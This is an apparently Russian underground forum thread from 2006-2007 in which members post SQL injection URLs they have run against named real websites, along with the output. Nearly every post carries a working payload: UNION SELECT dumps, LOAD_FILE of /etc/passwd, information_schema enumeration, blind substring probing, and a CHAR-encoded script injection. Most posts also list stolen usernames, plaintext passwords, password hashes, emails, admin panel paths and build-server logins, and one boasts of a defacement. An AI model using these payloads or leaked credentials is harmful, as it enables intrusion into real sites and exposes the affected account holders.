Вернуться   GraBBerZ.CoM - ICQ | Proxy | Бруты | Дедики | Эксплоиты > Underground > ][ack

Ответ
 
Опции темы Опции просмотра

SQL-Injection
Старый 27.12.2006, 00:14   #1
byte
 
Аватар для cRiLaZ
 
cRiLaZ вне форума
Регистрация: 26.09.2006
Сообщений: 99
Респекты: 21

SQL-Injection

1.Тема для показа найденных вами SQL-Injection на разных ресурсах.
Если найденный вами баг был где то опубликован, то сообщение будет удаляться.

2.Постим только доведённые до конца скули. Т.е. до вывода, версии, паролей, или уже до шелла.
Скули вида site.com/index.php?id=1' будут удалять


-----

Это говорит о несостоятельности наших прогеров, даже при написании такова приматства

Код:
_http://www.vanta.ru/script/catalog.php?cat=99999+UNION+SELECT+1,CHAR(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,72,105,32,50,32,71,114,97,66,66,101,114,90,32,84,101,97,77,34,41,59,60,47,115,99,114,105,112,116,62,60,104,49,62,99,114,105,108,97,122,32,105,100,105,111,84,60,47,104,49,62),3,4,5,6,7,8,9,10/*&clas=0
  Ответить с цитированием

Старый 21.06.2007, 22:04   #16
bit
 
Аватар для Emk
 
Emk вне форума
Регистрация: 06.06.2007
Сообщений: 34
Респекты: 21
Код:
http://mgei.cbx.ru/view/news1.php?did=92222222+union+select+1,concat_ws(0x3a,VERSION(),USER(),DATABASE()),3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5+from+news/*
Не густо, но главное тема не в простое.
  Ответить с цитированием

Старый 23.08.2007, 20:46   #17
 
Аватар для d0p3_sh0w
 
d0p3_sh0w вне форума
Регистрация: 09.05.2007
Сообщений: 45
Респекты: 25
Шлак:

Код:
http://vsvgroup.ru/
Код:
http://www.vsvgroup.ru/catalog.php?type=1&id=-16+union+select+1,2,3,concat(user,0x3a,pass)+from+users
user:pass

ВСВ админ:LkA8hE3
  Ответить с цитированием

Старый 01.10.2007, 11:59   #18
bit
 
Аватар для Helkern
 
Helkern вне форума
Регистрация: 28.12.2006
Сообщений: 31
Респекты: 34
Код:
http://imexbank.com.ua/rus/view.phtml?pollID=1+and+ascii(lower(substring((select+user+from+mysql.user),1,1)))%3E0
совместный хак грабберз + хакер.нейм =)
  Ответить с цитированием

Старый 06.10.2007, 02:19   #19
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Цитата:
_http://www.avd.org.ua/viewdetails.php?id=-151+union+select+1,2,3,4,5,username,7,8,9,10,11,12 ,13,14+from+user/*
Сори что недовел, но чтото мне невезет на колонку password 8( , добивайте сами.


//добавил через 5 минут

Цитата:
_http://www.avd.org.ua/viewdetails.php?id=-151+union+select+1,2,3,4,passwd,username,7,8,9,10, 11,12,13,14+from+user/*
123slayerok:avdinform
historic:barbarities966:historicc@mail.ru
4293414:290772:6174740@mail.ru и тд.
админка : http://www.avd.org.ua/account/login.php
__________________
  Ответить с цитированием

Старый 06.10.2007, 15:45   #20
 
Аватар для d0p3_sh0w
 
d0p3_sh0w вне форума
Регистрация: 09.05.2007
Сообщений: 45
Респекты: 25
Цитата:
Сообщение от b3
http://www.avd.org.ua/viewdetails.php?id=-151+union+select+1,2,3,4,5,username,7,8,9,10,11,12 ,13,14+from+user/*

Сори что недовел, но чтото мне невезет на колонку password 8( , добивайте сами.
Код:
http://www.avd.org.ua/viewdetails.php?id=-151+union+select+1,2,3,4,concat(username,0x3a,passwd,0x3a,email),6,7,8,9,10,11,12,13,14+from+user+limit+1,1
username:passwd:email
yar121:1212124:yar121@yandex.ru
  Ответить с цитированием

Старый 06.10.2007, 16:51   #21
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Цитата:
_http://director-online.com/buildArticle.php?id=-1+union+select+1,2,3,4,5,concat(user_password,0x3a ,user_name),7,8+from+user/*
пасс:юзер ид=1(админ)
fd83c04a3a625eb3354a824299ec22ea:Doug
хеш мд5 имхо

PS Данный сайт как я узнал через день, был похекан Хакер.Неймом. если не ошибаюсь =) ето к сведению, что скуль я не "заимствовал".
__________________
  Ответить с цитированием

Старый 08.10.2007, 01:56   #22
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
БД 5 version(), Позволяет посмотреть таблицу information_schema
узнал таблицу юзверей: (80я устал обновлять)
Цитата:
_http://www.sbinstitute.com/news.php?id=-1+union+select+1,2,table_name,4,5+from+information _schema.tables+limit+80,1
узнал все колонки:
Цитата:
_http://www.sbinstitute.com/events_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co lumn_name,16,17,18,19,20,21+from+information_schem a.columns+where+table_name=0x7573657273+limit+1,1
вывел:
Цитата:
_http://www.sbinstitute.com/news.php?id=-1+union+select+1,concat_ws(0x3a,postalcode,name_mi ,title,name_first,name_last),3,4,5+from+users
Так же нашел таблицу user и в ней колонки user и password , но они фильтруються заменял на char() но вывод пропал 8(
Цитата:
_http://www.sbinstitute.com/events_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,ch ar(0x70,0x61,0x73,0x73,0x77,0x6F,0x72,0x64),16,17, 18,19,20,21+from+information_schema.columns+where+ table_name=0x75736572+limit+1,1
Скуль безсмысленая, но все равно приятно.
ЗЫ Спасибо d0p3_sh0w , хороший учитель
__________________
  Ответить с цитированием

Старый 11.10.2007, 02:58   #23
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Версия >5
Цитата:
_http://www.mooreindhardware.com/products.php?id=3+union+select+1,2,version()/*
Таблицы и колонки:
Цитата:
_http://www.mooreindhardware.com/products.php?id=3+union+select+1,2,column_name+fro m+information_schema.columns
_http://www.mooreindhardware.com/products.php?id=3+union+select+1,2,table_name+from +information_schema.tables
Список колонок из таблицы tblogin
Цитата:
_http://www.mooreindhardware.com/products.php?id=3+union+select+1,2,column_name+fro m+information_schema.columns+where+table_name=0x74 626C6F67696E
__________________
  Ответить с цитированием

Старый 11.10.2007, 03:57   #24
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Версия >5 :
table : siteusers
Цитата:
_http://www.wilsonelectronics.com/ViewProductB.php?ID=-3+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25+from+infor mation_schema.tables+limit+34,1
таблица siteusers:
колнка userName:
Цитата:
_http://www.wilsonelectronics.com/ViewProductB.php?ID=-3+union+select+1,2,3,4,5,column_name,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25+from+info rmation_schema.columns+where+table_name=0x73697465 7573657273+limit+1,1
колонка userPWD
Цитата:
_http://www.wilsonelectronics.com/ViewProductB.php?ID=-3+union+select+1,2,3,4,5,column_name,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25+from+info rmation_schema.columns+where+table_name=0x73697465 7573657273+limit+2,1
Выводим:
Цитата:
_http://www.wilsonelectronics.com/ViewProductB.php?ID=-3+union+select+1,2,3,4,5,concat_ws(0x3a,userName,u serPWD),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25+from+siteusers
wilson:d2f19b11c28e04e95997ecd8d25df767
ЗЫ Грабберз Тим ищет расшифровшика хешей с большой базой словарей
__________________
  Ответить с цитированием

Старый 12.10.2007, 05:02   #25
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Order by прокатил:
Цитата:
_http://www.lanchesterbrassband.org.uk/news.php?id=7+order+by+6
Версия (5.0.27) Но information_schema непрокатила =\
Цитата:
_http://www.lanchesterbrassband.org.uk/news.php?id=7+union+select+1,version(),3,4,5,6
Дальше угадывал:
Таблица :users
Колонки: name,password
Готово: (limit 1,3)
Цитата:
_http://www.lanchesterbrassband.org.uk/news.php?id=7+union+select+1,concat_ws(0x3a,name,p assword),3,4,5,6+from+users+limit+1,3
хеши:
member:4e4d6c332b6fe62a63afe56171fd3725 расшифровал:haha
ian:919b720497e91197077a706775c5a9ad
adam:2e456fdbaadea50686a5809d9c540243

Админка member:haha
  Ответить с цитированием

Старый 14.10.2007, 06:43   #26
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Цитата:
_http://www.globalsmokefreepartnership.org/news.php?id=23+union+select+1,concat_ws(0x3a,usern ame,password,id,admin),3,4+from+members
ben:winter:1:1 - username:password:id:admin
adminka - www.globalsmokefreepartnership.org/admin/
__________________
  Ответить с цитированием

Старый 14.10.2007, 21:38   #27
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
www.marotori.com
version(5.0.45)
Цитата:
_http://www.marotori.com/news.php?id=7+union+select+1,version(),3,4,5,6
all user Tables:
users
wp_users
accounts
calls_users
contacts_users
emails_accounts
emails
emails_users
meetings_users
roles_users
travels_users
users_groups_link
zseq_folders_users_roles_link
zseq_users
Цитата:
_http://www.marotori.com/news.php?id=7+union+select+1,table_name,3,4,5,6+fr om+information_schema.tables
columns:
Цитата:
_http://www.marotori.com/news.php?id=7+union+select+1,column_name,3,4,5,6+f rom+information_schema.columns+where+table_name=0x 7573657273
user_name
user_password
user_hash
authenticate_id
sugar_login
is_admin
username
name
Цитата:
_http://www.marotori.com/news.php?id=7+union+select+1,user_name,3,user_pass word,5,6+from+users
root:$1$L/4.2R1.$cuYrMNjriZI/0JBcOLBZr.
admin:$1$2aqTdKet$IhBOYg.pLOD4E204JWgXr.
__________________
  Ответить с цитированием

Старый 17.10.2007, 07:50   #28
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Цитата:
_http://www.storage.ru/_newstor/news.php?id=-22+union+select+admin,password,nick,4,5+from+users +limit+1,1
storage:*0F92CFEE8E9D2DAB2209AC88700985F6425EC4A1
Цитата:
_http://www.impact.org/news.php?id=-22+union+select+1,2,3,4,concat_ws(0x3a,login,passw ord),6,7,8+from+users+limit+1,1
carlo:47ffb440cc2afb7bba618a02bd25741e
carlo.barrettara@impact.org:47ffb440cc2afb7bba618a02bd25741e
adam:f5489f1da0df19ee7ec09eb721501c3e
wilson:05199deca16614131327f2c3fea9031c
Цитата:
_http://sju.ca/about/news.php?id=-22+union+select+1,2,version(),4
бд5 а толку 0 невыводиться нифига
tables:
chatusers>username>password
mb_user>password>level>id
Цитата:
_http://www.basketball.com.np/news.php?id=-22+union+select+1,2,concat(username,0x3a,password) ,4,5+from+user
admin:e73833d10128caa0ecde2964b0323522
admin:dinesh1 hash md5()
defaced http://www.basketball.com.np/news.php?id=26
скрин http://fu2reteam.org/bastetball.gif
__________________
  Ответить с цитированием

Старый 18.10.2007, 21:21   #29
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Цитата:
_http://www.ppckernel.org/tree.php?id=-3+union+select+1,concat_ws(0x3a,name,pass,hostname ),3+from+buildhosts
dev:Jahdeha5:dev.build.ppckernel.org
hercules:hohKie4r:hercules.xorsis.com
hermes:Chofei5w:hermes.ppckernel.org
m2:yie7Phoi:m2.bccd.cluster.earlham.edu
c15:lohcooD2:c15.cluster.earlham.edu
acl2:eeceaZ8u:acl2.cs.earlham.edu
tobias:tmb2h3a:tobias.cluster.earlham.edu
hermes64:Chofei5w:hermes.ppckernel.org
Цитата:
_http://www.dccentralkitchen.org/program.php?id=3+union+select+1,username,password, 4,5,6+from+users
admin:c84258e9c39059a89ab77d846ddab909 мд5()
admin:admin2
__________________
  Ответить с цитированием

Старый 20.10.2007, 16:36   #30
byte
 
Аватар для MoLoToK
 
MoLoToK вне форума
Регистрация: 18.01.2007
Адрес: NiTRaLKa
Сообщений: 90
Респекты: 8
Код:
http://fckhimki.ru/modules/news/index.php?current_id=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Версия 4.0.27-max-log
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Время: 09:10



Powered by vBulletin® Version 3.7.6
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot